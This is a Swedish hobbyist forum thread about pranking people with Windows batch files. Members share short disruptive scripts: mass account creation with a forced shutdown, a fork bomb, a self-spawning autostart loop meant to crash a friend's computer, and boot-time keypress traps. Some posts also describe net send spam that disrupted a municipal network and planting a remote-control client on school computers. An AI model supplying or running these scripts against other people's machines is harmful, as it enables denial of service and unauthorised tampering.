Jävulskap & annat kul med .cmd/.bat filer

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av -Morrex-
@echo off

Color 2

net user HardToBelieve /add
net user AndAnotherOne /add
net user IGotYaDude /add
net user SryToManyAcc /add
net user ErrorOrSomething /add
net user UGoooootPwned /add
net user AllRight /add
net user HardToBelievee /add
net user AndAnotherOnee /add
net user IGotYaDudee /add
net user SryToManyAccc /add
net user ErrorOrSomethingg /add
net user UGoooootPwnedd /add
net user AllRightt /add
net user IWillBeHere /add

Color 6
shutdown.exe -s -t 100 -c "Made By MorreX111"

Om du råkar testa på dig själv så gör bara denna då:

@echo off

Color 2

net user HardToBelieve /delete
net user AndAnotherOne /delete
net user IGotYaDude /delete
net user SryToManyAcc /delete
net user ErrorOrSomething /delete
net user UGoooootPwned /delete
net user AllRight /delete
net user HardToBelievee /delete
net user AndAnotherOnee /delete
net user IGotYaDudee /delete
net user SryToManyAccc /delete
net user ErrorOrSomethingg /delete
net user UGoooootPwnedd /delete
net user AllRightt /delete
net user IWillBeHere /delete

Sjuuukt jobbig liten grej finns mkt

Finns också

@echo off

color 2

:A
Dir /s
goto A

ser mkt ut som en liten hacker är i farten

kanske e lite off men fejkar den nya användare på datorn? och vad gör

@echo off
color 2

:A
Dir /s
goto A

är en n00b när det gäller att koda

Visa signatur

AMD phenom x4 965 BE | Gigabyte GA-790XTA-UD4 |4GB A-DATA Gaming series | XFX Radeon HD 5850 Black edition | Cougar 700W modulärt agg |Cooler Master HAF 922 RED| HAF 922 RED

Permalänk
Jubileumsmästare

Någon som kan skriva en fil för att motverka att så fort jag klickar bakåt, i en mapp eller på internet så klickar den framåt instant.

Visa signatur

9900K | 970 EVO | 32GB G.Skill Trident Z Neo | 2080Ti
Asus ROG Maximus Extreme XI | Lian-Li PC-O11 Dynamic
Pok3r | G503 | Schiit Bifrost Über | Schiit Lyr
Hifiman HE-500 | HP Omen X Emperium 65
https://www.sweclockers.com/galleri/14987

Permalänk

Ta screenie på skrivbordet. Använd screeniet som bakgrundsbild. Högerklicka på skrivbordet, gå in i fliken "Ordna ikoner efter" och bocka ur Visa skrivbordsikoner.

Kan lämna honom konfys ett tag.

Permalänk
Medlem

Om ingen visste så var det 4 år sen han ville jävlas.... dvs, han har nog redan gjort det nu.

Visa signatur

Maskinen:
[ASUS Maximus Ranger VII][Intel I5 4690K @ 4.6Ghz 24/7 med Noctua NH-U14S]
[16Gb Gskill 2400Mhz 2x8Gb][MSI GTX 770 Gaming i SLI][XFX PRO 850w PSU]
[Kingston HyperX 240Gb SSD + 2Tb HDD]
[Windows 7 Ultimate][CoolerMaster Silencio 650 PURE][+ massa noctua fläktar]

Permalänk
Arvid Nordqvist-mannen
Citat:

Ursprungligen inskrivet av saabcool
Om ingen visste så var det 4 år sen han ville jävlas.... dvs, han har nog redan gjort det nu.

Om du inte vet det så har tråden fyllts med tips för att jävlas med nån och tråden är just nu 26 sidor lång:).

Permalänk
Medlem

Har inte läst hela tråden, men en sökning visade på att /MAXMEM inte tagits upp! Klart trevlig sak att sätta.

Mer info: http://support.microsoft.com/kb/108393/

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av KulanZ
haha! Rolig tråd! nu ska ni få höra på en rolig net send grej vi gjorde i veckan i skolan:
Vi hade en tråkig vanlig tyska lektion och skulle gå till datasalen och söka efter information om kantoner... men orka de:P, Så ja började skicka net send i stället. Jag skrev "net send /domain lol" och då kommer det upp på alla datorer i datasalen.. Dom andra Nissarna i tyskan blev ju intreserade över hur jag gjorde och kollade på min skärm va jag skrev i cmd, så efter 5sec så började alla skicka net send.. efter ett tag så blev de lite överdrivet och en skrev "net send /domian ååhh va skön du va igår lena\\erik".. Lena heter våran tyska lärare.. senn var lektionen slut.. Och nästa dag så ska vi till datorsalen igen och fortsätta med kantonerna..Men de blev inget net send för skolans it ansvarige Sture man, var inne å kollade på datorerna vilka det var som hade skickat net send, och de var ju förstås alla vi i tyskan. Han började kolla vilka det var som satt vid vilka datorer föregående dag å frågade om det var vi som hade skickat net send och alla knep käft å han blev skit sur, han drog säkert ett föredrag i 10min att sånnt fick vi absolut inte göra, och senn fick höra att nätverket i kommunen hade varit nere senns i går, pga vårat net send skickande:D.. och vi fick reda på att meddelandena visst gick ända till kommunhuset och alla skolor i kommunen.. inte bara till datorsalen. alla satt knäpptysta... nästa dag så fick alla prata enskilt med dom it ansvariga på skolan.. eftersom de var "obscena" texter som dom kallar det så kommer polis anmälan göras, vi kommer även bli avstängda från datorerna.. VI ligger RISIGT till, om man säger så.. allt från mej \\KulanZ

låter lite som töreboda centralskola x3 med lena i tyskan osv. am I right? xD

Permalänk
Medlem

:s
start %0
%0|%0
goto :s

Permalänk
Medlem

Kan inget om sånt här, men jag fick en idé.. Kan man göra något så att en viss tangent slutar att reagera? Tex space knappen.. Det vore ju SJUKT störande

<e> Eller alternativt "byta plats" på tangenter.

Visa signatur

Citera så att jag hittar tillbaka!

Permalänk

Sjukt att det tog fram till sida 5-6 nånting innan autoexec.bat nämndes. En kul, jobbig men ofarlig grej är att lägga in nått liknande detta i den:

Pause
Echo: 15 knapptryckningar kvar.
Pause
Echo: 14 knapptryckningar kvar.
Pause
Echo: 13 knapptryckningar kvar.
Pause
Echo: 12 knapptryckningar kvar.
Pause
Echo: 11 knapptryckningar kvar.
Pause
Echo: 10 knapptryckningar kvar.
Pause
Echo: 9 knapptryckningar kvar.
Pause
Echo: 8 knapptryckningar kvar.
Pause
Echo: 7 knapptryckningar kvar.
Pause
Echo: Nästan framme!
Pause
Echo: 5 knapptryckningar kvar.
Pause
Echo: 4 knapptryckningar kvar.
Pause
Echo: 3 knapptryckningar kvar.
Pause
Echo: 2 knapptryckningar kvar.
Pause
Echo: 1 knapptryckningar kvar.

Går säkert att göra mycket vackrare med en loop. Som sagt ganska elakt men roligt när nån stackare måste klicka 300ggr varje gång han ska starta datorn.

Annars kan man ju bara göra en
:1
Pause
Goto 1

och det kommer stå

Tryck ned valfri tangent för att fortsätta...

i oändlighet.

Visa signatur

i7 930 @ 3.8 | P6X58D-E | 6GB Corsair XMS3 | 2x R9280X | Intel SSD|
Dell UltraSharp 2707WFP | Logitech Z5500 | Logitech Illuminated | MIONIX Saiph 1800 |

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av )ExecutoR(
Sjukt att det tog fram till sida 5-6 nånting innan autoexec.bat nämndes. En kul, jobbig men ofarlig grej är att lägga in nått liknande detta i den:

Pause
Echo: 15 knapptryckningar kvar.
Pause
Echo: 14 knapptryckningar kvar.
Pause
Echo: 13 knapptryckningar kvar.
Pause
Echo: 12 knapptryckningar kvar.
Pause
Echo: 11 knapptryckningar kvar.
Pause
Echo: 10 knapptryckningar kvar.
Pause
Echo: 9 knapptryckningar kvar.
Pause
Echo: 8 knapptryckningar kvar.
Pause
Echo: 7 knapptryckningar kvar.
Pause
Echo: Nästan framme!
Pause
Echo: 5 knapptryckningar kvar.
Pause
Echo: 4 knapptryckningar kvar.
Pause
Echo: 3 knapptryckningar kvar.
Pause
Echo: 2 knapptryckningar kvar.
Pause
Echo: 1 knapptryckningar kvar.

Går säkert att göra mycket vackrare med en loop. Som sagt ganska elakt men roligt när nån stackare måste klicka 300ggr varje gång han ska starta datorn.

Annars kan man ju bara göra en
:1
Pause
Goto 1

och det kommer stå

Tryck ned valfri tangent för att fortsätta...

i oändlighet.

En gång fick jag en länk till en sida där det kom upp en massa meddelanden. Det gick inte att stänga det på något sätt och man var tvungen att klicka typ 150ggr för att man skulle kunna stänga sidan.

Visa signatur

O2+ODAC - Denon AH-D2000
MiniDSP SHD - Emotiva UPA1 - Had Oy högtalare

Permalänk

Mitt virus kopierar filer på ditt skrivbord. Försöker du ta bort dom möts du av ett fel meddelande.

Felmeddelande:
Det går ej att ta bort Porr. Detta används av en annan person eller ett annat program. Avsluta alla program som kan tänkas använda filen och försök sedan igen.

Kod:
@echo off
copy "Virus.BAT" "C:\Documents and Settings\All Users\skrivbord\Porr1.exe"

copy "Virus.BAT" "C:\Documents and Settings\All Users\skrivbord\Porr2.exe"

copy "Virus.BAT" "C:\Documents and Settings\All Users\skrivbord\Porr3.exe"

DEL "Virus.BAT"
exit

Lösning:
Öppna aktivitetshanteraren och stäng ner explorer.exe, nu är det bara att radera filen.

Permalänk
Hedersmedlem
Citat:

Ursprungligen inskrivet av lill_fyllot
Försöker du ta bort dom möts du av ett fel meddelande.

Nej, det enda som händer är att filer kopieras.

Permalänk

Pröva då, spara som en BAT fil.

Permalänk

Hur gör jag om jag vill att tex kalkylatorn kommer fram och sen efter 5 min kommer den igen

start calc
pause
start calc

det gick inte att skriva så... vad ska man skriva ?

Sen så undar jag vad man ska skriva för att få upp en tex google

Visa signatur

Intel i5 @ 2,66Ghz | Noctua NH-D14 | 4gb corsair 1600mhz | Asus P7P55D-E PRO | Antec p182 | Corsair 550w |Asus 6950 2gb upplåsta shaders, ASUS 5770 V2|Samsung SpinPoint F3 1 TB |Benq BL2400PT | LG 42PQ6500 | Steelseries Siberia v1 |Asus Xonar DX |Creative EP-630 | AKG K601 | Dynavoice F-6 EX 5.0 |Canton Reference 9.2 DC | Atacama Nexus 6| Onkyo 607

Permalänk
Hedersmedlem
Citat:

Ursprungligen inskrivet av jooelhoglund
Hur gör jag om jag vill att tex kalkylatorn kommer fram och sen efter 5 min kommer den igen

Man kan använda ping-tricket:

ping 1.1.1.1 -n 1 -w 300000 >nul

istället för "pause"

Permalänk

Hej, jag håller på att programmerar ett fake virus, allt är perfekt förutom en detalj. Är det någon här som vet någon kod som får datorn att låta extra mycket.

echo Deleting Root Partition...
start /w wscript.exe C:\sleep1000.vbs
echo del %systemroot%
*raderar*

Permalänk
Hedersmedlem
Citat:

Ursprungligen inskrivet av lill_fyllot
Är det någon här som vet någon kod som får datorn att låta extra mycket.

Det låter kanske inte så mycket, men det klassiska sättet att få en dator att pipa är

echo •

där "•" är det tecken man får genom att hålla ned "alt" och trycka på "7".

Permalänk

Försökte på mig något snabbt och smidigt sätt att ändra hosts-filen med hjälp av bat-filer men efter några misslyckanden testade jag i vb.net. Det gick att ändra i filen men jag märker inget när jag surfar... Är jag helt ut borta för jag var ganska säker på att man kunde skicka vidare någon från en adress till en annan om man ändrar i den filen...?

Det lilla programmet (ink. källkod): http://www.speedyshare.com/576191447.html

Visa signatur

][- perfect -][

Permalänk
Citat:

Ursprungligen inskrivet av Elgot
Man kan använda ping-tricket:

ping 1.1.1.1 -n 1 -w 300000 >nul

istället för "pause"

kan du förklara lite bättre vad som är vad av koden du skrev ?

Visa signatur

Intel i5 @ 2,66Ghz | Noctua NH-D14 | 4gb corsair 1600mhz | Asus P7P55D-E PRO | Antec p182 | Corsair 550w |Asus 6950 2gb upplåsta shaders, ASUS 5770 V2|Samsung SpinPoint F3 1 TB |Benq BL2400PT | LG 42PQ6500 | Steelseries Siberia v1 |Asus Xonar DX |Creative EP-630 | AKG K601 | Dynavoice F-6 EX 5.0 |Canton Reference 9.2 DC | Atacama Nexus 6| Onkyo 607

Permalänk
Citat:

Ursprungligen inskrivet av jooelhoglund
kan du förklara lite bättre vad som är vad av koden du skrev ?

Jag antar att den försöker pinga 1.1.1.1 och sedan väntar 300000 millisekunder innan den fortsätter. 300000/1000/60 = 5 minuter

Visa signatur

][- perfect -][

Permalänk
Citat:

Ursprungligen inskrivet av H4xXx0R
Jag antar att den försöker pinga 1.1.1.1 och sedan väntar 300000 millisekunder innan den fortsätter. 300000/1000/60 = 5 minuter

okej tack för svar

Visa signatur

Intel i5 @ 2,66Ghz | Noctua NH-D14 | 4gb corsair 1600mhz | Asus P7P55D-E PRO | Antec p182 | Corsair 550w |Asus 6950 2gb upplåsta shaders, ASUS 5770 V2|Samsung SpinPoint F3 1 TB |Benq BL2400PT | LG 42PQ6500 | Steelseries Siberia v1 |Asus Xonar DX |Creative EP-630 | AKG K601 | Dynavoice F-6 EX 5.0 |Canton Reference 9.2 DC | Atacama Nexus 6| Onkyo 607

Permalänk

slängde ihop denna för att vara elak mot en "kompis"

@echo off
move "jätteelak.bat" "C:\Documents and Settings\All Users\Start-meny\Program\Autostart\"
color 0A
:loop
start jätteelak.bat
GOTO loop

men den verkar inte riktigt gör som jag vill... jag vill att den ska få datorn att crasha men jag testade den på mig själv utan autostart och det fick itne datorn att hänga sig oturligt nog :S
Nån som har nån aning om var jag kan ha gjort fel (är grymt nybörjare på Bat och VBS scripts men denna tråd har varit till mycket hjälp

Visa signatur

Gaming-riggen: AMD Phenom II x4 940 @ 3.7ghz | M4A78-E | XFX Ati Radeon HD 4890 | 4 Gig Corsair | Corsair HX750W
Reserv-riggen: P4 @ 3gHz | 2Gig ram | 8600gt 512mb | 350 watts No-name agg
We are the Knights who say: Ekki Ekki Ekki Ptang Zurooboin!

Permalänk
Hedersmedlem
Citat:

Ursprungligen inskrivet av MålbrottarN
Nån som har nån aning om var jag kan ha gjort fel (är grymt nybörjare på Bat och VBS scripts men denna tråd har varit till mycket hjälp

Dagens system är dessvärre rätt dåliga på att hänga sig; det krävs nästan en dålig drivrutin.

Permalänk

Pröva mitt fake virus här, önskar lite support om vad som var bra och vad som inte var bra. Filen öppnas som en .BAT fil och innehåller endast echo meddelanden.

http://www.megaupload.com/?d=FJMDRNA3

Permalänk
Medlem

bus

en rätt rolig grej är att ta en skärmdump av någons skärm, i något läge vederbörande brukar sitta tex excel eller kalendern i outlook

sen lägger du denna bild som bakgrundsbild och stänger ned alla program

när vederbörande kommer tillbaka till datorn kan han klicka ihjäl sig för att stänga outlook och excel det händer ingenting hihi

ett annat rätt roligt icke-dator-hack är att tejpa ned klykan på telefonen med genomskinlig tejp. passa gärna på att koppla bort lur-sladden helt och hållet från telefonen.

När det väl ringer så svarar snubben, lyfter luren, men det fortsätter att ringa medan han sitter där med en lur utan sladd i handen mot örat o säger hallå hallå... det är helt obetalbart

andreas

Permalänk
Medlem

bus

en gång skrev jag en rätt rolig bakgrundstjänst till windows.

den växlar mellan två lägen cirka var 45:e sekund:

Läge 1:
Den skickar utdiverse bokstäver i tangentbordsbufferten cirka var 6:e-14:e sekund, slumpvis

Läge 2: den skickar WM_CLOSE till det aktuella öppna fönstret någon gång cirka var 15:e sekund

Det är en väldigt liten exe-fil som installerar sig själv som bakgrundstjänst genom att man kör xxxx.exe /install.

Är man riktigt jävlig så går man ifrån datorn sen -- då startar inte bakgrundstjänsten förrän vid nästa omboot.

annars startar man tjänsten.

Det blir helt omöjligt att arbeta i windows. Dels kommer slumpvis bokstäver i det du skriver, dels försöker den stänga det fönster du är i då och då, eller avsluta programmet. Om du har ett dokument i word frågar den om du vill spara. har du otur så kommer det ett slumpvis N eller ett slumpvis J eller Y efter ett tag.

Är du ute i cmd-prompten och försöker stoppa tjänsten så stängs fönstret lite då o då, innan du hunnit skriva något vettigt´kommando, iaf innan du hunnit stava rätt till det, det kommer ju slumpvis bokstäver då och då.

Är du inne i administrative tools - services och försöker stopppa tjänsten så stängs fönstret automatiskt innan du hunnit leta reda på vilken tjänst det är - likadant med task manager...

sammanfattningsvis ett helt underbart bus som kan få vem som helst att begå självmord på 20 minuter.

Permalänk

Nu har det här inget med cmd eller bat filer att göra, men det är bland av de äldsta i böckerna så det är värt att nämnas.

1: Sätt någon av de här bilderna i helskärm: http://images.google.se/images?hl=sv&q=cracked%20screen&um=1&...
2: Koppla ur mus och tangentbord.
3: Gå från datorn.

Kul att lura de allra dummaste ibland

Visa signatur

][- perfect -][

Permalänk

Re: bus

Citat:

Ursprungligen inskrivet av andbir

Läge 2: den skickar WM_CLOSE till det aktuella öppna fönstret någon gång cirka var 15:e sekund

Hur fixar man wm_close ?

är det.bat eller .vbs ?

Visa signatur

Intel i5 @ 2,66Ghz | Noctua NH-D14 | 4gb corsair 1600mhz | Asus P7P55D-E PRO | Antec p182 | Corsair 550w |Asus 6950 2gb upplåsta shaders, ASUS 5770 V2|Samsung SpinPoint F3 1 TB |Benq BL2400PT | LG 42PQ6500 | Steelseries Siberia v1 |Asus Xonar DX |Creative EP-630 | AKG K601 | Dynavoice F-6 EX 5.0 |Canton Reference 9.2 DC | Atacama Nexus 6| Onkyo 607

Permalänk
Medlem

Oh vad jag älskar denna tråden <3

När jag var liten och noob brukade jag kopiera färdiga ut-med-cd-luckan-skript härifrån, sjukt kul.

Kan berätta lite om förra året.

Jag hade upptäckt skriptspråket AHK och lärt mig lite i det. Väldigt kraftfullt, men ändå så simpelt. Efter en del små program i det gjorde jag en stor sak, FjärrAdmin. Jag bootade upp med linux live cd på alla skolans datorer och in FjärrKlient i autostart. Sen kunde jag ha kul på lektionerna med FjärrAdmin och styra alla andra datorer.

AHK är enkelt och bra, gratis och man kan konvertera till .exe.
Läs:
http://www.autohotkey.com/docs/commands.htm
http://www.autohotkey.com/download/
http://www.autohotkey.com/docs/Tutorial.htm

Om någon vill ha källkoden till FjärrAdmin, ta kontakt med mig:
Skype: kottebolaget
IRC: Kottizen på kottnet.homelinux.net
MSN: kottizen@rikskriminalen.com